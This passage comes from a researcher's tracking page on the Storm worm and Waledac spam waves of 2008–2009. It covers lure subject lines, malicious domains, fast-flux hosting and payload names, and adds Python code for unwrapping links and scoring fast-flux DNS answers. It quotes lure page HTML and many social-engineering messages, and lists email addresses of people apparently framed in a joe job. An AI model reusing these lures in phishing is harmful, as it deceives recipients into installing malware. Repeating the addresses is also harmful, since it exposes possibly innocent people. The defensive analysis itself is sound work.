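        if nxt is None or nxt in chain:   # no further wrapper, or a loop
            break
        chain.append(nxt)
    return chain


def sibling(url, filename):
    """Same scheme, host and directory as url, with a different file name."""
    parts = urlsplit(url)
    directory = parts.path.rsplit("/", 1)[0]
    return urlunsplit((parts.scheme, parts.netloc, f"{directory}/{filename}", "", ""))


if __name__ == "__main__":
    chain = unwrap(SAMPLE_LINK)
    print(" -> ".join(chain))
    print("sibling payload:", sibling(chain[-1], "video.exe"))
```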
May 19
Spam links now use raw IP addresses, to conceal the domain names from researchers and take-down.
Subject: Missing you with every breath
The Mood for Love http://xxx.x.xx.64/
Subject: I Knew I Loved You
You & Me http://xxx.xxx.xxx.102/
Payload = iloveyou.exe loveyou.exe
Adding any subdirectory causes a redirection (http://xxx.x.xx.64/blah/) to
- catsharp.com *
- followequate.com [client hold by Xin Net, May 28]
- lowsmell.com *
- picturewest.com *
- posestory.com *
- printlength.com *
- producemorning.com *
- pressrose.com *
- industrydictionary.com
which are Canadian Pharmacy brands.
* means these run on a fast-flux botnet of 20 IP addresses, refreshing every 2 minutes.
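Scoring repeated DNS answers for fast-flux behaviour, as an added example (not code from the original page). It applies the usual heuristics, many addresses, many unrelated networks and a very short TTL, to constructed answer sets; the address pool reuses the name-server list shown under February 11 as a stand-in for an A-record rotation, and the thresholds are assumptions.

```python
"""Fast-flux check over repeated DNS answers.

Added example, not code from the original page. It scores the pattern the
page describes for Storm hosting: many A records across unrelated networks
with a zero TTL ("0 refresh", "refreshing every 2 minutes").
"""
import ipaddress

# Constructed pool: the 13 llldddnnn.com name-server addresses listed above.
POOL = [
    "76.212.174.58", "68.252.56.21", "64.221.169.181", "75.132.160.97",
    "68.184.51.232", "80.197.35.241", "90.150.141.112", "78.8.106.11",
    "59.31.54.198", "60.53.245.92", "98.206.242.41", "76.97.95.128",
    "24.98.214.216",
]


def network_key(ip):
    """Coarse 'which network' key (/16). A real tool would map to ASN."""
    return str(ipaddress.ip_network(f"{ip}/16", strict=False))


def rotate(pool, start, n):
    return [pool[(start + k) % len(pool)] for k in range(n)]


# Constructed answer sets: (minutes since first query, TTL, A records).
FLUX_OBSERVATIONS = [(2 * i, 0, rotate(POOL, 5 * i, 5)) for i in range(6)]
STABLE_OBSERVATIONS = [(2 * i, 3600, ["192.0.2.10", "192.0.2.11"]) for i in range(6)]
# Low TTL and many addresses, but all in one network: a CDN, not flux.
CDN_LIKE_OBSERVATIONS = [
    (2 * i, 60, [f"198.51.100.{10 + i}", f"198.51.100.{20 + i}"]) for i in range(6)
]


def flux_score(observations, min_addresses=5, min_networks=3, max_ttl=300):
    """Summarise a series of answer sets and decide whether they look fast-flux.

    Thresholds are an assumption (typical fast-flux heuristics), not values
    fixed by this page.
    """
    addresses, networks = set(), set()
    min_ttl = None
    churn = 0          # consecutive answer sets sharing no address at all
    previous = None
    for _minutes, ttl, records in observations:
        current = set(records)
        addresses |= current
        networks |= {network_key(ip) for ip in current}
        min_ttl = ttl if min_ttl is None else min(min_ttl, ttl)
        if previous is not None and not (previous & current):
            churn += 1
        previous = current
    verdict = (len(addresses) >= min_addresses
               and len(networks) >= min_networks
               and min_ttl is not None and min_ttl <= max_ttl)
    return {
        "distinct_addresses": len(addresses),
        "distinct_networks": len(networks),
        "min_ttl": min_ttl,
        "full_rotations": churn,
        "fast_flux": verdict,
    }


if __name__ == "__main__":
    for name, obs in (("storm-like", FLUX_OBSERVATIONS),
                      ("stable", STABLE_OBSERVATIONS),
                      ("cdn-like", CDN_LIKE_OBSERVATIONS)):
        print(name, flux_score(obs))
```

The network-diversity test is what separates flux hosting from a content-delivery network: a CDN also answers with short TTLs and changing addresses, but those addresses sit in the provider's own ranges, whereas the Storm pool is scattered across consumer ISPs.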
June 1
Sample spam:
Subject: You have touched my heart Missing you http://xxx.xx.xx.73/
The page source contains
<html>
<head>
<title>Who is loving you?</title>
</head>
<body>
<center><img src="lr.gif"><br>
Who is loving you? Do you want to know? Just <a href="loveyou.exe">click here</a> and choose either "Open" or "Run".
</body>
</html>
The payload is loveyou.exe
June 18
Short emails using an IP based URL (http://xxx.xxx.xxx.xxx) with a theme of the China Earthquake and sometimes mention of the Beijing Olympics. The click-through shows a page with a black screen promising a video. Clicking to see the video installs the Storm infection.
Sampled from the subject lines:
- 2008 Olympic Games are under the threat
- A new powerful disaster in China
- A new deadly catastrophe in China
- China is paralyzed by new earthquake
Payload: beijing.exe
June 25 Storm is sending both the "China disaster" story as well as a seemingly incompetent email with a reply address
Hello, my friend. Do you want to buy any stuff: any kind of pills, oem software, cool porn? Just mail me back, i'll find the best offer for you. My Email: gpdude22@yahoo.com
The embedded e-mail addresses vary:
- cstygstra@gmail.com
- gpdude22@yahoo.com
- infrared35@gmail.com
- jim@tegelaar.com
- wagz_is_god@yahoo.com
This may be a "Joe job" designed to tarnish the reputation of those people.
June 29 Sample message:
> Date: Sun, 29 Jun 2008 01:32:24 +0900
> From: xxxxx@xxxxx.xxx
> Subject: You make my world special -
> My heart belongs to you http://latinlovesite.com/
Known domains
- latinlovesite.com
- makinglovedirect.com
- theloveparade.com
- yourloveletter.com
- youronlinelove.com
- lollypopycandy.com (used as a name server)
- verynicebank.com (used as a name server)
Payload = winner.exe mylove.exe
July 4
Storm worm themes frequently correlate with seasonal holidays, specifically those celebrated in the U.S. July 4th is Independence Day in the U.S., and a major holiday. Storm sites display a faux-video image with fireworks. The message on the sites is "Colorful Independence Day events have already started throughout the country. The largest firework happens on the last weekday before the Fourth of July. Unprecedented sum of money was spent on this fabulous show. If you want to see the best Independence Day firework just click on the video and run it."
It is interesting to note that storm sites do not mark major holidays not observed in the U.S., like Guy Fawkes Day, May Day, International Women's Day, or Bastille Day, nor are they fooled by U.S. public holidays like Labor Day whose significance among the general public is mostly limited to being a day off work. It suggests the involvement of someone who has at least lived for some time in the U.S. But clumsy English usage, like "firework" used in the singular or "stars and strips (sic) forever," suggests a non-native speaker is writing the subject headings and body messages, as well as the messages included on the sites themselves.
The spam has links to infected IP addresses, not domain names. All storm infected servers display the same image, not just the ones with fixed IP addresses which are included in spam. Subject headings and bodies include
- Amazing firework 2008
- Amazing Independence Day show
- America for You and Me
- America the Beautiful
- American Independence Day
- Bright and joyful Fourth of July
- Celebrate Independence
- Celebrating Fourth of July
- Celebrating the Glory of our Nation
- Celebrating the spirit of our Country
- Celebrations have already begun
- Fabulous Independence Day firework
- God bless America
- Happy Birthday, America!
- Happy Fourth of July
- Happy Independence Day
- Happy Independence Day!!
- Independence Day firework broke all records
- Light up the sky
- Sparkling Celebration of Independence Day
- Spectacular fireworks show
- Stars and Strips forever
- Super 4th!
- The best of 4th of July Salute
- The best firework you've ever seen
- Time for Fireworks
- Well done 4th!
- Wish your friends a happy Independence Day
Payload=fireworks.exe
(Whoever chose the name for the payload apparently is aware that "fireworks" is always plural.)
July 21
The site text reads:
The U.S. Government began to realize the plan to replace the Dollar with the "Amero", the new currency of the North American Currency Union. Canada, the United States of America and Mexico have resolved to unit in order to resist the Worldwide Financial Crysis. You can become acquainted with the plan of the implementation of Amero, just click on the icon under this text.
Payload = amero.exe
The Amero image is also found at http://signaveritae.wordpress.com/2008/01/09/our-failing-dollar/
July 29
Storm spam arrives with subject headings about the FBI spying on Facebook users. (It goes nearly unnoticed in the midst of a deluge of spam linking to trojan downloads on hacked websites; those spams carry similar subject lines consisting of inflammatory news headlines.)
Subject: The F.B.I.'s plan to "profile" Facebook
FBI may strike Facebook http://SmartNewsRadio.com/
Other possible lines used as subjects or body text include
- F.B.I. can watch our conversation through Facebook
- F.B.I. tries to fight Facebook
- FBI Watching Possible Terrorists on Facebook
- FBI Watching Hezbollah in Facebook
- FBI bypasses Facebook to nail you
- The F.B.I. has a new way of tracking Facebook
Payload = fbi_facebook.exe
Gary Warner has a more extensive listing on his blog page
Obviously, people who visit one of those infected sites and download storm on their computers will have someone spying on them, but it won't be the FBI.
August 2008 - December 2008
August 14
Targeting followers of headline news stories, the Storm team sent millions of e-mails with catchy headlines whose "msnbc" or "CNN" link led to a decoy site; clicking the news link downloaded the Storm trojan, for example masquerading as an Adobe Flash Player upgrade, adobe_flash.exe. 13 out of 20 antivirus engines identified it as Storm. For example:
F-Secure Anti-Virus Found Email-Worm:W32/Zhelatin.YH, Trojan-Downloader.Win32.Exchanger.nb
January 2009 -
January 1
Are there still people willing to click on ecards? Someone thinks so. The malware is no longer detected as "storm"/tibs/zhelatin but as "walezof", a distinct malware entity.
Why include it here? Beyond the "ecard" theme, the similarities in the botnet hosting are strong: these domains use a single seat botnet with zero-second refresh, and Storm had been the only botnet we'd observed with that pattern. Analysts at Shadowserver report that it uses a similar peer-to-peer network as well. It is either being distributed by the same criminals or by a very ardent admirer.
The ultimate smoking gun would be to find one of the old surviving Storm domains now displaying the same content or sitting on the same botnet, but those domains now refuse connections altogether (rather than displaying different content) and they are not on a fast-flux botnet at all.
January 17
Waledac's similarities to Storm continue. Storm previously tried to lure people into clicking with fake sites offering news about some catastrophic disaster; now it's a spoof of Barack Obama's campaign website with a fake news item claiming he is refusing to assume office next week. Like storm, all the previous domains with ecard themed names have also begun displaying the Obama theme.
Payloads:
- president.exe
- obama.exe
- statement.exe
- baracknews.exe
- obamanews.exe
- barack.exe
- barackspeech.exe
- barackblog.exe
- obamablog.exe
- obamaspeech.exe
- usa.exe
- news.exe
- speech.exe
- blog.exe
- love.exe
- youandme.exe
- onlyme.exe
- onlyyou.exe
- you.exe
- video.exe
- readme.exe
- postcard.exe
- pdf.exe
- doc.exe
- file.exe
January 25
Waledac assumes a Valentines theme, though not a lot of spam is arriving in the US. It changes to a puppy dog Valentine theme on February 9, but still only there if you go looking for it.
Further reading
- CNN / msnbc update, August 2008
- Tracking by SudoSecure
- Jose Nazario's analysis of April 1 2008
- Controlling domains for Storm
- Storm Tracker at TrustedSource
- Stephen Fry's non-technical summary
- Websense Security Labs: Analysis of the Storm worm waves of releases
- Storm Worm Botnet Attacks Anti-Spam Firms
- Symantec White Paper on Peerbots: Catch me if you can
- Storm design predicted
- Fast-flux as used by Storm
- The Storm Worm Wikipedia entry
- Storm Worm as a botnet
- Crypto-Gram Newsletter